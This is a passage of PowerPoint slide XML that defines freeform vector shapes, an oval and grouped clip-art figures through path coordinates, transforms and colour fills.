                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="597"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="864"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="897"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1129"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="1060"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="829"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="796"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="529"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="496"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="304"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="264"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="68"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="828282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51" name="Freeform 213"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="200" y="1941"/>
                  <a:ext cx="1293" cy="347"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T1" fmla="*/ 340 h 408"/>
                    <a:gd name="T2" fmla="*/ 255 w 1535"/>
                    <a:gd name="T3" fmla="*/ 0 h 408"/>
                    <a:gd name="T4" fmla="*/ 0 w 1535"/>
                    <a:gd name="T5" fmla="*/ 68 h 408"/>
                    <a:gd name="T6" fmla="*/ 1280 w 1535"/>
                    <a:gd name="T7" fmla="*/ 408 h 408"/>
                    <a:gd name="T8" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T9" fmla="*/ 340 h 4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5" h="408">
                      <a:moveTo>
                        <a:pt x="1535" y="340"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="255" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="68"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="408"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1535" y="340"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="6D6D6C"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="545554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30" name="Group 214"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2775" y="1969"/>
                <a:ext cx="104" cy="207"/>
                <a:chOff x="2269" y="2594"/>
                <a:chExt cx="317" cy="628"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="731" name="Freeform 215"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="2320" y="2898"/>
                  <a:ext cx="119" cy="324"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 89 w 90"/>
                    <a:gd name="T1" fmla="*/ 156 h 245"/>
                    <a:gd name="T2" fmla="*/ 89 w 90"/>
                    <a:gd name="T3" fmla="*/ 7 h 245"/>
                    <a:gd name="T4" fmla="*/ 89 w 90"/>
                    <a:gd name="T5" fmla="*/ 5 h 245"/>
                    <a:gd name="T6" fmla="*/ 63 w 90"/>
                    <a:gd name="T7" fmla="*/ 20 h 245"/>
                    <a:gd name="T8" fmla="*/ 12 w 90"/>
                    <a:gd name="T9" fmla="*/ 10 h 245"/>
                    <a:gd name="T10" fmla="*/ 2 w 90"/>
                    <a:gd name="T11" fmla="*/ 0 h 245"/>
                    <a:gd name="T12" fmla="*/ 3 w 90"/>
                    <a:gd name="T13" fmla="*/ 36 h 245"/>
                    <a:gd name="T14" fmla="*/ 2 w 90"/>
                    <a:gd name="T15" fmla="*/ 205 h 245"/>
                    <a:gd name="T16" fmla="*/ 43 w 90"/>
                    <a:gd name="T17" fmla="*/ 205 h 245"/>
                    <a:gd name="T18" fmla="*/ 45 w 90"/>
                    <a:gd name="T19" fmla="*/ 51 h 245"/>
                    <a:gd name="T20" fmla="*/ 36 w 90"/>
                    <a:gd name="T21" fmla="*/ 40 h 245"/>
                    <a:gd name="T22" fmla="*/ 45 w 90"/>
                    <a:gd name="T23" fmla="*/ 51 h 245"/>
                    <a:gd name="T24" fmla="*/ 43 w 90"/>
                    <a:gd name="T25" fmla="*/ 205 h 245"/>
                    <a:gd name="T26" fmla="*/ 44 w 90"/>
                    <a:gd name="T27" fmla="*/ 211 h 245"/>
                    <a:gd name="T28" fmla="*/ 88 w 90"/>
                    <a:gd name="T29" fmla="*/ 218 h 245"/>
                    <a:gd name="T30" fmla="*/ 89 w 90"/>
                    <a:gd name="T31" fmla="*/ 15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" h="245">
                      <a:moveTo>
                        <a:pt x="89" y="156"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="89" y="141"/>
                        <a:pt x="90" y="47"/>
                        <a:pt x="89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  <a:cubicBezTo>
                        <a:pt x="55" y="20"/>
                        <a:pt x="24" y="13"/>
                        <a:pt x="12" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="10"/>
                        <a:pt x="4" y="5"/>
                        <a:pt x="2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5"/>
                        <a:pt x="43" y="205"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="171"/>
                        <a:pt x="46" y="55"/>
                        <a:pt x="45" y="51"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="45" y="47"/>
                        <a:pt x="36" y="47"/>
                        <a:pt x="36" y="40"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="36" y="47"/>
                        <a:pt x="45" y="47"/>
                        <a:pt x="45" y="51"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="55"/>
                        <a:pt x="43" y="171"/>
                        <a:pt x="43" y="205"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="207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32" name="Freeform 216"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1" noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="2269" y="2680"/>
                  <a:ext cx="312" cy="257"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 235 w 236"/>
                    <a:gd name="T1" fmla="*/ 114 h 194"/>
                    <a:gd name="T2" fmla="*/ 235 w 236"/>
                    <a:gd name="T3" fmla="*/ 114 h 194"/>
                    <a:gd name="T4" fmla="*/ 225 w 236"/>
                    <a:gd name="T5" fmla="*/ 49 h 194"/>
                    <a:gd name="T6" fmla="*/ 199 w 236"/>
                    <a:gd name="T7" fmla="*/ 24 h 194"/>
                    <a:gd name="T8" fmla="*/ 156 w 236"/>
                    <a:gd name="T9" fmla="*/ 13 h 194"/>
                    <a:gd name="T10" fmla="*/ 116 w 236"/>
                    <a:gd name="T11" fmla="*/ 2 h 194"/>
                    <a:gd name="T12" fmla="*/ 86 w 236"/>
                    <a:gd name="T13" fmla="*/ 12 h 194"/>
                    <a:gd name="T14" fmla="*/ 73 w 236"/>
                    <a:gd name="T15" fmla="*/ 86 h 194"/>
                    <a:gd name="T16" fmla="*/ 73 w 236"/>
                    <a:gd name="T17" fmla="*/ 86 h 194"/>
                    <a:gd name="T18" fmla="*/ 72 w 236"/>
                    <a:gd name="T19" fmla="*/ 91 h 194"/>
                    <a:gd name="T20" fmla="*/ 21 w 236"/>
                    <a:gd name="T21" fmla="*/ 104 h 194"/>
                    <a:gd name="T22" fmla="*/ 26 w 236"/>
                    <a:gd name="T23" fmla="*/ 135 h 194"/>
                    <a:gd name="T24" fmla="*/ 80 w 236"/>
                    <a:gd name="T25" fmla="*/ 122 h 194"/>
                    <a:gd name="T26" fmla="*/ 80 w 236"/>
                    <a:gd name="T27" fmla="*/ 122 h 194"/>
                    <a:gd name="T28" fmla="*/ 86 w 236"/>
                    <a:gd name="T29" fmla="*/ 120 h 194"/>
                    <a:gd name="T30" fmla="*/ 99 w 236"/>
                    <a:gd name="T31" fmla="*/ 112 h 194"/>
                    <a:gd name="T32" fmla="*/ 104 w 236"/>
                    <a:gd name="T33" fmla="*/ 92 h 194"/>
                    <a:gd name="T34" fmla="*/ 104 w 236"/>
                    <a:gd name="T35" fmla="*/ 92 h 194"/>
                    <a:gd name="T36" fmla="*/ 110 w 236"/>
                    <a:gd name="T37" fmla="*/ 47 h 194"/>
                    <a:gd name="T38" fmla="*/ 109 w 236"/>
                    <a:gd name="T39" fmla="*/ 167 h 194"/>
                    <a:gd name="T40" fmla="*/ 118 w 236"/>
                    <a:gd name="T41" fmla="*/ 178 h 194"/>
                    <a:gd name="T42" fmla="*/ 169 w 236"/>
                    <a:gd name="T43" fmla="*/ 192 h 194"/>
                    <a:gd name="T44" fmla="*/ 196 w 236"/>
                    <a:gd name="T45" fmla="*/ 173 h 194"/>
                    <a:gd name="T46" fmla="*/ 196 w 236"/>
                    <a:gd name="T47" fmla="*/ 160 h 194"/>
                    <a:gd name="T48" fmla="*/ 216 w 236"/>
                    <a:gd name="T49" fmla="*/ 155 h 194"/>
                    <a:gd name="T50" fmla="*/ 219 w 236"/>
                    <a:gd name="T51" fmla="*/ 154 h 194"/>
                    <a:gd name="T52" fmla="*/ 232 w 236"/>
                    <a:gd name="T53" fmla="*/ 146 h 194"/>
                    <a:gd name="T54" fmla="*/ 236 w 236"/>
                    <a:gd name="T55" fmla="*/ 124 h 194"/>
                    <a:gd name="T56" fmla="*/ 235 w 236"/>
                    <a:gd name="T57" fmla="*/ 114 h 194"/>
                    <a:gd name="T58" fmla="*/ 192 w 236"/>
                    <a:gd name="T59" fmla="*/ 75 h 194"/>
                    <a:gd name="T60" fmla="*/ 194 w 236"/>
                    <a:gd name="T61" fmla="*/ 88 h 194"/>
                    <a:gd name="T62" fmla="*/ 200 w 236"/>
                    <a:gd name="T63" fmla="*/ 123 h 194"/>
                    <a:gd name="T64" fmla="*/ 196 w 236"/>
                    <a:gd name="T65" fmla="*/ 124 h 194"/>
                    <a:gd name="T66" fmla="*/ 194 w 236"/>
                    <a:gd name="T67" fmla="*/ 88 h 194"/>
                    <a:gd name="T68" fmla="*/ 192 w 236"/>
                    <a:gd name="T69" fmla="*/ 75 h 194"/>
                    <a:gd name="T70" fmla="*/ 192 w 236"/>
                    <a:gd name="T71" fmla="*/ 71 h 194"/>
                    <a:gd name="T72" fmla="*/ 192 w 236"/>
                    <a:gd name="T73" fmla="*/ 75 h 1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6" h="194">
                      <a:moveTo>
                        <a:pt x="235" y="114"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="235" y="114"/>
                        <a:pt x="235" y="114"/>
                        <a:pt x="235" y="114"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="230" y="85"/>
                        <a:pt x="226" y="57"/>
                        <a:pt x="225" y="49"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="222" y="32"/>
                        <a:pt x="207" y="27"/>
                        <a:pt x="199" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="191" y="21"/>
                        <a:pt x="169" y="16"/>
                        <a:pt x="156" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="144" y="9"/>
                        <a:pt x="125" y="3"/>
                        <a:pt x="116" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="107" y="0"/>
                        <a:pt x="89" y="4"/>
                        <a:pt x="86" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="85" y="14"/>
                        <a:pt x="79" y="50"/>
                        <a:pt x="73" y="86"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="73" y="86"/>
                        <a:pt x="73" y="86"/>
                        <a:pt x="73" y="86"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="72" y="91"/>
                        <a:pt x="72" y="91"/>
                        <a:pt x="72" y="91"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="49" y="96"/>
                        <a:pt x="28" y="103"/>
                        <a:pt x="21" y="104"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="109"/>
                        <a:pt x="9" y="137"/>
                        <a:pt x="26" y="135"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="31" y="135"/>
                        <a:pt x="55" y="129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6" y="120"/>
                        <a:pt x="86" y="120"/>
                        <a:pt x="86" y="120"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="92" y="118"/>
                        <a:pt x="96" y="116"/>
                        <a:pt x="99" y="112"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="102" y="108"/>
                        <a:pt x="104" y="102"/>
                        <a:pt x="104" y="92"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="104" y="92"/>
                        <a:pt x="104" y="92"/>
                        <a:pt x="104" y="92"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="107" y="65"/>
                        <a:pt x="110" y="43"/>
                        <a:pt x="110" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="110" y="53"/>
                        <a:pt x="109" y="125"/>
                        <a:pt x="109" y="167"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="110" y="172"/>
                        <a:pt x="112" y="177"/>
                        <a:pt x="118" y="178"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="130" y="180"/>
                        <a:pt x="162" y="190"/>
                        <a:pt x="169" y="192"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="177" y="194"/>
                        <a:pt x="193" y="184"/>
                        <a:pt x="196" y="173"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="171"/>
                        <a:pt x="196" y="162"/>
                        <a:pt x="196" y="160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="202" y="158"/>
                        <a:pt x="208" y="157"/>
                        <a:pt x="216" y="155"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="217" y="155"/>
                        <a:pt x="218" y="154"/>
                        <a:pt x="219" y="154"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="225" y="152"/>
                        <a:pt x="229" y="150"/>
                        <a:pt x="232" y="146"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="235" y="142"/>
                        <a:pt x="236" y="135"/>
                        <a:pt x="236" y="124"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="235" y="114"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="192" y="75"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="193" y="79"/>
                        <a:pt x="194" y="83"/>
                        <a:pt x="194" y="88"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="195" y="97"/>
                        <a:pt x="197" y="108"/>
                        <a:pt x="200" y="123"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="198" y="123"/>
                        <a:pt x="197" y="124"/>
                        <a:pt x="196" y="124"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="111"/>
                        <a:pt x="195" y="99"/>
                        <a:pt x="194" y="88"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="193" y="82"/>
                        <a:pt x="193" y="78"/>
                        <a:pt x="192" y="75"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="192" y="73"/>
                        <a:pt x="192" y="72"/>
                        <a:pt x="192" y="71"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="192" y="72"/>
                        <a:pt x="192" y="73"/>
                        <a:pt x="192" y="7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33" name="Freeform 217"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="2338" y="2664"/>
                  <a:ext cx="87" cy="55"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 29 w 66"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 10 w 66"/>
                    <a:gd name="T3" fmla="*/ 23 h 41"/>
                    <a:gd name="T4" fmla="*/ 15 w 66"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 53 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 29 h 41"/>
                    <a:gd name="T10" fmla="*/ 29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29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6" y="21"/>
                        <a:pt x="13" y="16"/>
                        <a:pt x="15" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="10"/>
                        <a:pt x="53" y="0"/>
                        <a:pt x="53" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="53" y="21"/>
                        <a:pt x="47" y="25"/>
                        <a:pt x="57" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66" y="33"/>
                        <a:pt x="46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34" name="Oval 218"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2330" y="2594"/>
                  <a:ext cx="104" cy="105"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1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735" name="Group 219"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2330" y="2761"/>
                  <a:ext cx="256" cy="201"/>
                  <a:chOff x="1315" y="1508"/>
                  <a:chExt cx="596" cy="469"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="737" name="Freeform 220"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"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8" name="Freeform 221"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"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9" name="Freeform 222"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="1315" y="1589"/>
                    <a:ext cx="297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36" name="Freeform 223"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="2295" y="2843"/>
                  <a:ext cx="121" cy="71"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 75 w 91"/>
                    <a:gd name="T1" fmla="*/ 0 h 54"/>
                    <a:gd name="T2" fmla="*/ 27 w 91"/>
                    <a:gd name="T3" fmla="*/ 14 h 54"/>
                    <a:gd name="T4" fmla="*/ 40 w 91"/>
                    <a:gd name="T5" fmla="*/ 46 h 54"/>
                    <a:gd name="T6" fmla="*/ 91 w 91"/>
                    <a:gd name="T7" fmla="*/ 32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1" h="54">
                      <a:moveTo>
                        <a:pt x="75" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="61" y="4"/>
                        <a:pt x="45" y="9"/>
                        <a:pt x="27" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="22"/>
                        <a:pt x="17" y="54"/>
                        <a:pt x="40" y="46"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="44"/>
                        <a:pt x="65" y="38"/>
                        <a:pt x="91" y="32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884" name="Freeform 1309"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3811068" y="3623166"/>
              <a:ext cx="1627038" cy="438049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CACACA"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="B2B2B2"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gradFill>
            <a:ln w="19050" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd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885" name="Group 817"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4090168" y="2666968"/>
              <a:ext cx="1071342" cy="1315398"/>
              <a:chOff x="4429" y="1256"/>
              <a:chExt cx="856" cy="1051"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="886" name="Freeform 757"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4429" y="1256"/>
                <a:ext cx="856" cy="230"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 6257"/>
                  <a:gd name="T1" fmla="*/ 841 h 1680"/>
                  <a:gd name="T2" fmla="*/ 3134 w 6257"/>
                  <a:gd name="T3" fmla="*/ 0 h 1680"/>
                  <a:gd name="T4" fmla="*/ 6257 w 6257"/>
                  <a:gd name="T5" fmla="*/ 839 h 1680"/>
                  <a:gd name="T6" fmla="*/ 3122 w 6257"/>
                  <a:gd name="T7" fmla="*/ 1680 h 1680"/>
                  <a:gd name="T8" fmla="*/ 0 w 6257"/>
                  <a:gd name="T9" fmla="*/ 841 h 1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57" h="1680">
                    <a:moveTo>
                      <a:pt x="0" y="841"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3134" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6257" y="839"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3122" y="1680"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="841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7" name="Freeform 758"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4856" y="1371"/>
                <a:ext cx="429" cy="936"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3135 w 3135"/>
                  <a:gd name="T1" fmla="*/ 5997 h 6838"/>
                  <a:gd name="T2" fmla="*/ 3135 w 3135"/>
                  <a:gd name="T3" fmla="*/ 0 h 6838"/>
                  <a:gd name="T4" fmla="*/ 0 w 3135"/>
                  <a:gd name="T5" fmla="*/ 841 h 6838"/>
                  <a:gd name="T6" fmla="*/ 0 w 3135"/>
                  <a:gd name="T7" fmla="*/ 6838 h 6838"/>
                  <a:gd name="T8" fmla="*/ 3135 w 3135"/>
                  <a:gd name="T9" fmla="*/ 5997 h 6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35" h="6838">
                    <a:moveTo>
                      <a:pt x="3135" y="5997"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3135" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="841"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6838"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3135" y="599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CC66">
                      <a:gamma/>
                      <a:tint val="33725"/>
                      <a:invGamma/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="FFCC66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8" name="Freeform 759"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4429" y="1371"/>
                <a:ext cx="427" cy="936"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3122 w 3122"/>
                  <a:gd name="T1" fmla="*/ 6836 h 6836"/>
                  <a:gd name="T2" fmla="*/ 3122 w 3122"/>
                  <a:gd name="T3" fmla="*/ 839 h 6836"/>
                  <a:gd name="T4" fmla="*/ 0 w 3122"/>
                  <a:gd name="T5" fmla="*/ 0 h 6836"/>
                  <a:gd name="T6" fmla="*/ 0 w 3122"/>
                  <a:gd name="T7" fmla="*/ 5998 h 6836"/>
                  <a:gd name="T8" fmla="*/ 3122 w 3122"/>
                  <a:gd name="T9" fmla="*/ 6836 h 6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22" h="6836">
                    <a:moveTo>
                      <a:pt x="3122" y="6836"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3122" y="839"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5998"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3122" y="683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CC66">
                      <a:gamma/>
                      <a:tint val="33725"/>
                      <a:invGamma/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="FFCC66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9" name="Freeform 763"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5007" y="2093"/>
                <a:ext cx="135" cy="173"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 983 w 983"/>
                  <a:gd name="T1" fmla="*/ 1009 h 1266"/>
                  <a:gd name="T2" fmla="*/ 983 w 983"/>
                  <a:gd name="T3" fmla="*/ 0 h 1266"/>
                  <a:gd name="T4" fmla="*/ 0 w 983"/>
                  <a:gd name="T5" fmla="*/ 258 h 1266"/>
                  <a:gd name="T6" fmla="*/ 0 w 983"/>
                  <a:gd name="T7" fmla="*/ 1266 h 1266"/>
                  <a:gd name="T8" fmla="*/ 983 w 983"/>
                  <a:gd name="T9" fmla="*/ 1009 h 1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3" h="1266">
                    <a:moveTo>
                      <a:pt x="983" y="1009"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="983" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1266"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="983" y="100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0" name="Freeform 764"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5077" y="2098"/>
                <a:ext cx="61" cy="150"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 452 w 452"/>
                  <a:gd name="T1" fmla="*/ 980 h 1098"/>
                  <a:gd name="T2" fmla="*/ 452 w 452"/>
                  <a:gd name="T3" fmla="*/ 0 h 1098"/>
                  <a:gd name="T4" fmla="*/ 0 w 452"/>
                  <a:gd name="T5" fmla="*/ 118 h 1098"/>
                  <a:gd name="T6" fmla="*/ 0 w 452"/>
                  <a:gd name="T7" fmla="*/ 1098 h 1098"/>
                  <a:gd name="T8" fmla="*/ 452 w 452"/>
                  <a:gd name="T9" fmla="*/ 980 h 10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2" h="1098">
                    <a:moveTo>
                      <a:pt x="452" y="980"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="452" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1098"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="98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1" name="Freeform 765"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
